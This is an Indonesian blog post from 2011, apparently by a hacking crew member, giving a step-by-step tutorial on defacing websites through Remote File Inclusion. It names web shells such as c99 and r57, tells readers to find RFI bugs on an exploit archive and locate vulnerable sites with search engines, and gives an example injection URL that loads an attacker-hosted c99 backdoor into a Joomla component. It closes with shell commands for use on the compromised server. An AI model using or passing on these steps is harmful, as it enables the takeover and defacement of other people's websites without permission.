Coba ajah klik..

Senin, 10 Januari 2011

DEFACE website dengan RFI (REMOTE FILE Inclusion)

Cara mendefaca dengan RFI (Remote File Inclusion) disini akan menceritakanbagaimana akhirnya bisa mengerti metode RFI Hacking sebelum kita masuk kedalam RFI ada baiknya mengetahui Web-shell dahulu,sebab nanti ini kan di pakai dalam RFI macam-macam web-shell: 1. c99 2. c100 3. r57 4. ekin0x 5. locus7 bagamana mencarinya backdoor tersebut, kita cari melalui google lagi-lagi intro nih, yups betul, agar lebih paham aja gitu RFI apa itu???? RFI(Remote File Inclusion) adalah salah satu metode hacking dengan memanfaatkan pintu belkang atau sering disebut backdoor!
======= PERTAMA ======= sebelum penyerangan,marilah kita berdoa menurut agama dan kepercayaan masing2........... AMIEN !!!

======= KEDUA ======= ok setelah kita bedoa, bukalah www.milw0rm.com kemudian klik search kemudian tulislah RFI

======== KETIGA ======== udah kebuka tuh banyak sekali bug RFI disitu, pilih salah satu

========= KEEMPAT ========= setelah kita dapat bugnya kemudian kita search denga google example bug: administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=[evil code] ======== KELIMA ======== kemudian search lah dengan google, apabila kita telah mendapatkan sitenya, trus kita taro file backdoor example: wwww.coba-coba.com/administrator/component/com_profiler/plugin.class.php?mosConfig_absolute_path=www.punyague.net/backdoor/c99.txt??

======== KEENAM ======== apabila dibrowser tidak ada tampilan apa2 hanya tampilan site biasa,maka site tersebut sudah tidak vuln lagi apabila dibrowser anda ada tampilan backdoor, maka site tersebut telah anda kuasai, dan selanjutnya terserah anda... perintah yang berguna saat melakukan aktivitas backdooring: cd namadirectory = Melihat Suatu directory ls -al = Melihat Suatu Directory Lebih Dalam lagi fined = Mengecek Directory directory cat = Membaca Suatu Berkas wget = MengUpload suatu Files tar -zxvf = MengExtraxt suatu files yang berbentuk tgz pwd = Mengetahui Di Directory mana Kita Berada uname -a = Keberadaan Path berada w = Mengetahui Siapa Saja yang telah menggunakan Shell. curl = mendownload url sekian tutorial dari gue, bukannya gue mau sok tahu, tapi gue cuma mau berbagi apa yang udah gue dapet selama ini, apabila da yang kurang mohon muf gretz: Mywisdom,flyf_666,petimati,7460,gunslinger_,sat_ n soon we are devilzc0de crew run with bug n exploits
Diposting oleh news story and most exciting new di 04.57

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)